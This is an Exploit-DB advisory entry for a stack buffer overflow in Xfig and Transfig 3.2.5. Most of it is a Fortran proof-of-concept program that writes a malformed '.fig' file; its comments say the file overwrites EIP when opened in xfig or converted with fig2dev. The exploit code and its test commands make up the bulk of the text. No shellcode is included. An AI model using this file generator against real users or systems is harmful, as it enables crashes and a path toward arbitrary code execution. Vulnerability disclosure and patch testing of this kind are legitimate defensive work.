Xfig and Transfig 3.2.5 - '.fig' Remote Buffer Overflow

EDB-ID:

33388




Platform:

Linux

Date:

2009-12-03


source: https://www.securityfocus.com/bid/37193/info

Xfig and Transfig are prone to a buffer-overflow vulnerability because they fail to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Xfig and Transfig 3.2.5 are vulnerable; other versions may also be affected. 

       PROGRAM XFIG_POC

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
C
C      XFIG <= 3.2.5B BUFFER OVERFLOW
C      TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
C      WWW.XFIG.ORG
C
C      AUTHORS:
C      * PEDAMACHEPHEPTOLIONES <pedamachepheptoliones@gmail.com>
C      * D.B. COOPER
C
C      PROBLEM:
C      A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
C      WHEN READING MALFORMED .FIG FILES
C      EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
C
C      TEST:
C      xfig plane.fig
C      fig2dev -L png plane.fig
C      (IT DOESN'T HAVE TO BE "PNG")
C
C      SOLUTION:
C      DON'T TAKE .FIG CANDY FROM STRANGERS
C
C      OLDSKOOL FORTRAN POCS FTW
C
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

       INTEGER I
       CHARACTER(LEN=167) :: STR

       DO 10 I=1,167
       STR(I:I)='Z'
10     CONTINUE

       OPEN(11,FILE='plane.fig')
       WRITE(11,*) '0 1 2 3'
       WRITE(11,*) '4'
       WRITE(11,*) '1 2 3 4 5 6 7 '//STR
       CLOSE(11)

       WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'

       END PROGRAM XFIG_POC